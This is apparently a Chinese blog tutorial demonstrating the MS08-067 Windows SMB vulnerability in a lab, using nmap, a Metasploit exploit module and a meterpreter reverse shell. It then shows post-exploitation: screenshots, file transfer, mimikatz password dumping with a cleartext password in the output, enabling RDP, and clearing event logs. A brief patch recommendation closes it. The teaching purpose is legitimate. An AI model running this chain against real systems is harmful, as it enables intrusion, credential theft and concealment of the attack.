-
Metasploit MS08-067 漏洞利用演示
- MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
-
原理解析:
- 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Windows系统主要的网络服务程序。
- SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
- MSRPC网络服务
- 这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
- ncacn_ip_tcp 135
- ncadg_ip_udp 135
- ncacn_np (TCP 139和445)主要是这个,SMB命名管道传输协议
- server服务--支持计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。
-
漏洞利用演示
-
演示环境
- 靶机:Windows XP sp3 (192.168.2.6)
- 攻击机:kali 2020 (192.168.2.3)
-
1、首先测试一下在Kali上能够ping通靶机
-
2、使用nmap扫描靶机是否存在MS08-067漏洞
- nmap --script=vuln 192.168.2.6
-
3、启动Metasploit
- msfconsle
-
4、搜索MS08-067的攻击模块
- search ms8-067
- 输出的信息一共包括6列,分别是#(模块编号)、Name(模块名称)、Disclosure Date(发布日期)、Rank(级别)、Check(是否支持检察)和Description(描述)。
-
5、启用该攻击模块
- use exploit/windows/smb/ms08_067_netapi
-
6、显示攻击载荷
- show payloads
-
7、查看支持的目标系统
- show targets
-
8、设置攻击有效载荷
- set payload windows/meterpreter/reverse_tcp
-
9、查看Payload配置选项
- show options
- 输出的信息包括模块选项、Payload选项和利用的目标三部分。前两个选项信息分为四列,分别是Name(名称)、Current Setting(当前设置)、Required(需要)和Description(描述)。如果Required列的值为yes,则表示该项必须设置;如果为no,则可以不设置。
-
10、设置RHOSTS选项
- set RHOSTS 192.168.2.6
-
11、实施渗透测试
- exploit 或者 run
-
12、Meterpreter
- Meterpreter是Metasploit的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
- 1)捕获屏幕
- meterpreter > screenshot
- Screenshot saved to: /root/diIxqzrL.jpeg
- 2)上传/下载文件
- meterpreter > upload 1.txt c:\\
- meterpreter > download c:\\1.txt
- 3)远程桌面
- meterpreter > run vnc
- 4)进入目标主机shell
- meterpreter > shell
- Process 960 created.
- Channel 14 created.
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:\WINDOWS\system32>exit
- exit
- meterpreter > shell
- 5)获取用户密码
- meterpreter > load mimikatz
- Loading extension mimikatz...Success.
- meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
- "0;70234","NTLM","ping","A-3326A091E7764","
- ping,A-3326A091E7764,abc.123"
- "0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY",""
- "0;996","Negotiate","NETWORK SERVICE","NT AUTHORITY","
- A-3326A091E7764$,WORKGROUP,"
- "0;45664","NTLM","","",""
- "0;999","NTLM","A-3326A091E7764$","WORKGROUP",""
- meterpreter > load mimikatz
- 6)启用远程桌面
- meterpreter > run post/windows/manage/enable_rdp
- [*] Enabling Remote Desktop
- [*] RDP is disabled; enabling it ...
- [*] Setting Terminal Services service startup mode
- [*] The Terminal Services service is not set to auto, changing it to auto ...
- [*] Opening port in local firewall if necessary
- [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201104235514_default_192.168.2.6_host.windows.cle_291746.txt
- 查看远程用户的空闲时长
- meterpreter > idletime
- User has been idle for: 19 mins 23 secs
- 使用rdesktop命令远程连接桌面
- root@kali:~# rdesktop 192.168.2.6
- Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
- Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
- root@kali:~# rdesktop 192.168.2.6
- meterpreter > run post/windows/manage/enable_rdp
- 7)清除日志
- meterpreter > clearev
- [*] Wiping 48 records from Application...
- [*] Wiping 63 records from System...
- [*] Wiping 0 records from Security...
- meterpreter > clearev
-
8)解决方案
- 升级到最新的Windows系统
- 安装KB958644补丁
-
Metasploit MS08-067 漏洞利用演示
最新推荐文章于 2024-07-11 22:58:31 发布